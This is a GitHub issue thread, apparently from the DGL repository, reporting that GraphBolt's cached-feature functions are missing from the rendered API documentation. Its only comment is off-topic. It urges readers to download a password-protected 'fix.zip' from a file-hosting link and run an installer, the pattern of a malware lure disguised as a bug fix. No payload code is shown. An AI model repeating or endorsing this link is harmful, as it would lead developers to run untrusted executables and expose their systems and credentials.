### ISSUE TITLE
[GraphBolt][Doc] gb.[gpu|cpu]_cached_feature is not showing

### ISSUE THREAD

**Issue by mfbalin** [dmlc/dgl#7742]
## 🔨Work Item

**IMPORTANT:**
* This template is only for dev team to track project progress. For feature request or bug report, please use the corresponding issue templates.
* DO NOT create a new work item if the purpose is to fix an existing issue or feature request. We will directly use the issue in the project tracker.

Project tracker: https://github.com/orgs/dmlc/projects/2

## Description

https://github.com/dmlc/dgl/blob/master/docs/source/api/python/dgl.graphbolt.rst#feature-and-featurestore

Even though those functions are listed here, they don't show up in the documentation.

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
